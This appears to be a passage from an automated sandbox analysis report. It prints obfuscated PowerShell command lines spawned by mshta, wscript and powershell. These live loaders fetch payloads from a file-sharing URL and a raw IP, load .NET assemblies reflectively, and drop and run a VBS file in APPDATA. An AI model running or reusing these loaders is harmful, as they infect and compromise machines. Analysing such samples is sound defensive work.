                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $Codigo = 'KCdzSE5pbWFnZVVybCA9IGI0Rmh0dHBzOi8vMTAxJysnNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1JysndyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNycrJzZhMDkwNGYgYjRGO3NITndlYkNsJysnaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cycrJ0hOaW1hZ2VCeXRlcyA9IHNITndlYkNsaWVudC5Eb3dubG8nKydhZERhdGEoc0hOaW1hZ2VVcmwpO3NITmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHNITmltJysnYWdlQnl0ZXMpO3NITnN0YXJ0RmxhZyA9IGI0Rjw8QkFTRTY0X1NUQVJUPj5iNEY7c0hOZW5kRmxhZyA9ICcrJ2I0Rjw8QkFTRTY0X0VORD4+YjRGO3NITnN0YXJ0SW5kZXggPSBzSCcrJ05pbWFnZVRlJysneHQuSW5kZXhPZihzSE5zdGFydEZsYWcpO3NITmVuZEluZCcrJ2V4ID0gc0hOaW1hZ2VUZXh0LkluZGV4T2Yoc0hOZW5kRmxhZyk7c0hOc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNITmVuZEluZGV4IC1ndCBzSE5zdGFydCcrJ0luZGV4O3NITnN0JysnYXJ0SW5kZXggKz0gc0hOc3RhcnRGbGFnJysnLkxlbmd0aDtzSE5iYXNlJysnNjRMZW5ndGggPSBzSE5lbmRJbmRleCAtIHNITnN0YXJ0SW5kZXg7c0hOYmFzZTY0Q29tbWFuZCA9IHNITicrJ2knKydtYWdlVGV4dC5TdWJzdHJpbmcoc0hOc3RhcnRJbmRleCwgc0hOYmFzZTY0TGVuZ3RoKTtzSE5iYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzSE5iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgczdnIEZvckVhY2gtT2JqZWN0IHsgc0hOXyB9KVstMS4uLShzSE5iYXNlNjRDb21tYW5kLkxlbmd0aCldO3NITmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTJysndHJpbmcoc0hOYmEnKydzZTY0UmV2ZXJzZWQpO3NITmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCcrJyhzSE5jb21tYW5kQnl0ZXMpO3NITnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoYjRGVkFJYjRGKTtzSE52YWlNZXRob2QuSW52bycrJ2tlKHNITm51bGwsIEAoYjRGdHh0LkVEU1NSRi85MjMvODMxLjE3MS40OS4zMi8vOnB0dGhiNEYsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RmRlc2F0aXZhZG9iNCcrJ0YsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RkNhc1BvbCcrJ2I0RiwgYjRGZGVzYXRpdmFkb2I0RiwgYjRGZGVzYXRpdmFkb2InKyc0RixiNEZkZXNhdGl2YWQnKydvYjRGLGI0RmRlc2F0aXZhZG9iNEYsYjRGZGVzYXRpdmFkb2I0RixiNEZkZXNhdGl2YWRvYjRGLGI0RmRlc2F0aXZhZG9iJysnNEYsYjRGMWI0RixiNEZkZXNhdGl2YWRvYjRGKSk7JykuUkVwbGFDZSgnYjRGJyxbc1RySW5nXVtDSGFyXTM5KS5SRXBsYUNlKCdzSE4nLCckJykuUkVwbGFDZSgnczdnJywnfCcpIHwmICggJFBzaG9tZVs0XSskUFNIT21FWzMwXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
                    Obfuscated command line found
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F, b4Fdesativadob4'+'F, b4Fdesativadob4F, b4FCasPol'+'b4F, b4Fdesativadob4F, b4Fdesativadob'+'4F,b4Fdesativad'+'ob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob'+'4F,b4F1b4F,b4Fdesativadob4F));').REplaCe('b4F',[sTrIng][CHar]39).REplaCe('sHN','$').REplaCe('s7g','|') |& ( $Pshome[4]+$PSHOmE[30]+'X')"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F, b4Fdesativadob4'+'F, b4Fdesativadob4F, b4FCasPol'+'b4F, b4Fdesativadob4F, b4Fdesativadob'+'4F,b4Fdesativad'+'ob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob'+'4F,b4F1b4F,b4Fdesativadob4F));').REplaCe('b4F',[sTrIng][CHar]39).REplaCe('sHN','$').REplaCe('s7g','|') |& ( $Pshome[4]+$PSHOmE[30]+'X')"Jump to behavior
                    PowerShell case anomaly found
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'JFFVICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNreXNEeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmeUF5YmEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRmZIaEgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRqYyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPbXF1aGx2bUJJKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAid2prT094RWxYIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNd3VyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRVTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk0LjE3MS4xMzgvMzI5L2NyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlbmdvb2QudElGIiwiJGVuVjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyIsMCwwKTtzdGFSVC1zbGVFcCgzKTtpRXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyI='+[chAr]34+'))')))"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'JFFVICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNreXNEeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmeUF5YmEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRmZIaEgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRqYyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPbXF1aGx2bUJJKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAid2prT094RWxYIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNd3VyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRVTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk0LjE3MS4xMzgvMzI5L2NyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlbmdvb2QudElGIiwiJGVuVjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyIsMCwwKTtzdGFSVC1zbGVFcCgzKTtpRXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyI='+[chAr]34+'))')))"Jump to behavior
                    Suspicious powershell command line found
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'JFFVICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNreXNEeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmeUF5YmEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRmZIaEgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRqYyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPbXF1aGx2bUJJKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAid2prT094RWxYIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNd3VyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRVTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk0LjE3MS4xMzgvMzI5L2NyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlbmdvb2QudElGIiwiJGVuVjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyIsMCwwKTtzdGFSVC1zbGVFcCgzKTtpRXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyI='+[chAr]34+'))')))"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzSE5pbWFnZVVybCA9IGI0Rmh0dHBzOi8vMTAxJysnNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1JysndyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNycrJzZhMDkwNGYgYjRGO3NITndlYkNsJysnaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cycrJ0hOaW1hZ2VCeXRlcyA9IHNITndlYkNsaWVudC5Eb3dubG8nKydhZERhdGEoc0hOaW1hZ2VVcmwpO3NITmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHNITmltJysnYWdlQnl0ZXMpO3NITnN0YXJ0RmxhZyA9IGI0Rjw8QkFTRTY0X1NUQVJUPj5iNEY7c0hOZW5kRmxhZyA9ICcrJ2I0Rjw8QkFTRTY0X0VORD4+YjRGO3NITnN0YXJ0SW5kZXggPSBzSCcrJ05pbWFnZVRlJysneHQuSW5kZXhPZihzSE5zdGFydEZsYWcpO3NITmVuZEluZCcrJ2V4ID0gc0hOaW1hZ2VUZXh0LkluZGV4T2Yoc0hOZW5kRmxhZyk7c0hOc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNITmVuZEluZGV4IC1ndCBzSE5zdGFydCcrJ0luZGV4O3NITnN0JysnYXJ0SW5kZXggKz0gc0hOc3RhcnRGbGFnJysnLkxlbmd0aDtzSE5iYXNlJysnNjRMZW5ndGggPSBzSE5lbmRJbmRleCAtIHNITnN0YXJ0SW5kZXg7c0hOYmFzZTY0Q29tbWFuZCA9IHNITicrJ2knKydtYWdlVGV4dC5TdWJzdHJpbmcoc0hOc3RhcnRJbmRleCwgc0hOYmFzZTY0TGVuZ3RoKTtzSE5iYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzSE5iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgczdnIEZvckVhY2gtT2JqZWN0IHsgc0hOXyB9KVstMS4uLShzSE5iYXNlNjRDb21tYW5kLkxlbmd0aCldO3NITmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTJysndHJpbmcoc0hOYmEnKydzZTY0UmV2ZXJzZWQpO3NITmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCcrJyhzSE5jb21tYW5kQnl0ZXMpO3NITnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoYjRGVkFJYjRGKTtzSE52YWlNZXRob2QuSW52bycrJ2tlKHNITm51bGwsIEAoYjRGdHh0LkVEU1NSRi85MjMvODMxLjE3MS40OS4zMi8vOnB0dGhiNEYsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RmRlc2F0aXZhZG9iNCcrJ0YsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RkNhc1BvbCcrJ2I0RiwgYjRGZGVzYXRpdmFkb2I0RiwgYjRGZGVzYXRpdmFkb2InKyc0RixiNEZkZXNhdGl2YWQnKydvYjRGLGI0RmRlc2F0aXZhZG9iNEYsYjRGZGVzYXRpdmFkb2I0RixiNEZkZXNhdGl2YWRvYjRGLGI0RmRlc2F0aXZhZG9iJysnNEYsYjRGMWI0RixiNEZkZXNhdGl2YWRvYjRGKSk7JykuUkVwbGFDZSgnYjRGJyxbc1RySW5nXVtDSGFyXTM5KS5SRXBsYUNlKCdzSE4nLCckJykuUkVwbGFDZSgnczdnJywnfCcpIHwmICggJFBzaG9tZVs0XSskUFNIT21FWzMwXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F, b4Fdesativadob4'+'F, b4Fdesativadob4F, b4FCasPol'+'b4F, b4Fdesativadob4F, b4Fdesativadob'+'4F,b4Fdesativad'+'ob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob'+'4F,b4F1b4F,b4Fdesativadob4F));').REplaCe('b4F',[sTrIng][CHar]39).REplaCe('sHN','$').REplaCe('s7g','|') |& ( $Pshome[4]+$PSHOmE[30]+'X')"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'JFFVICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNreXNEeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmeUF5YmEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRmZIaEgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRqYyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPbXF1aGx2bUJJKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAid2prT094RWxYIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNd3VyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRVTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk0LjE3MS4xMzgvMzI5L2NyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlbmdvb2QudElGIiwiJGVuVjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyIsMCwwKTtzdGFSVC1zbGVFcCgzKTtpRXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyI='+[chAr]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzSE5pbWFnZVVybCA9IGI0Rmh0dHBzOi8vMTAxJysnNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1JysndyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNycrJzZhMDkwNGYgYjRGO3NITndlYkNsJysnaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cycrJ0hOaW1hZ2VCeXRlcyA9IHNITndlYkNsaWVudC5Eb3dubG8nKydhZERhdGEoc0hOaW1hZ2VVcmwpO3NITmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHNITmltJysnYWdlQnl0ZXMpO3NITnN0YXJ0RmxhZyA9IGI0Rjw8QkFTRTY0X1NUQVJUPj5iNEY7c0hOZW5kRmxhZyA9ICcrJ2I0Rjw8QkFTRTY0X0VORD4+YjRGO3NITnN0YXJ0SW5kZXggPSBzSCcrJ05pbWFnZVRlJysneHQuSW5kZXhPZihzSE5zdGFydEZsYWcpO3NITmVuZEluZCcrJ2V4ID0gc0hOaW1hZ2VUZXh0LkluZGV4T2Yoc0hOZW5kRmxhZyk7c0hOc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNITmVuZEluZGV4IC1ndCBzSE5zdGFydCcrJ0luZGV4O3NITnN0JysnYXJ0SW5kZXggKz0gc0hOc3RhcnRGbGFnJysnLkx